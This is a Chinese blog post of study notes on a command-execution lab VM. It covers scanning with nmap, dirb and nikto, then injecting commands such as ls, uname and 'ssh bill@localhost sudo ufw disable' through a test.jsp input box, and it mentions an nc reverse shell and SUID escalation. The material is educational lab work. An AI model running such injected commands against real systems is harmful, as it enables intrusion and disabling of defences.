6.21命令执行靶场

文章详细介绍了如何利用命令执行漏洞进行靶场渗透测试,包括扫描IP、端口,发现并访问靶机,使用dirb、nikto等工具扫描目录,尝试执行系统命令,如ls、uname等,以及在发现SSH服务后尝试登陆和利用反弹shell进行进一步攻击。
摘要由CSDN通过智能技术生成

 命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令

应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令,当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行漏洞

 靶场渗透过程:

(35条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客

靶场导入vm

扫描IP获得靶机地址带vm标识

扫描可能的IP的端口判断是不是靶机

有多个vm   进行地址栏访问地址判断哪个是靶机地址  判断出120是靶机地址

根据端口扫描进行地址访问

扫描目录:

dirb http://192.168.3.120:22
dirb http://192.168.3.120:5355
dirb http://192.168.3.120:8080

访问:

 http://192.168.3.120:8080/

http://192.168.3.120:8080/index.html

 192.168.3.120:8080/manager

 换工具进行扫描

nikto -host http://192.168.3.120:8080 

1.  192.168.3.120:8080/manager/html

2.  http://192.168.3.120:8080/test.jsp

 

根据页面提示输入

ls -l 

ls -l /tmp

ls -alh /home

uname -a

ssh bill@localhost sudo -l

 ssh bill@localhost sudo ufw disable

kali设置监听端口 

 http://192.168.3.120:8080/manager/status

ps:

asp .net  运行在iis中间件

php    运行在 apache  nginx

jsp    运行在java 

dirb nikto 御剑  dirsearch扫描目录

nikto -h 1892.168.3.120:8080

发现目录:

1.manager.html:没有权限

2.text.jsp:

发现有页面 输入框   

输入IP地址有没有反应

pwd可以执行

ls执行不了

whomi

ls -l /tmp出现信息文件   

ls -alh /tmp 发现隐藏文件  没有重要信息

ls -alh /  发现很多文件  但不重要

ls -alh /home  发现用户bill   和文件bill

cat /home/bill  命令执行不了

more /home/bill  命令执行不了

tac /home/bill  命令执行不了

cat -alh /etc/passwd  命令执行不了

ls -alh /etc/passwd  命令执行

cd /home/ 命令执行不了

说明只能执行ls -l上面可以执行的

3.看目录 :8080/manager/status  显示要求登陆   看页面源代码发现一个用户名和密码   但登不进去

nmap -sV 192.168.3.120 -p 1-65535 

发现有ssh  尝试用发现的用户和密码进行登陆  s3cret

使用漏洞扫描工具进行扫描

4.返回在8080:/text.jsp进行输入

ssh bill@localhost sudo -l

(35条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客

 使用反弹shell连接

在登录框用nc方式生成反弹shell

反弹shell原理和常见反弹shell方式 - 知乎 (zhihu.com)

 Linux下几种常见的反弹shell方式 - 简书 (jianshu.com)

 (36条消息) 【学习笔记】bash -i命令_ps_x的博客-CSDN博客

kali开启防火墙  service ufw status

suid权限

Linux SetUID(SUID)文件特殊权限用法详解 (biancheng.net)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值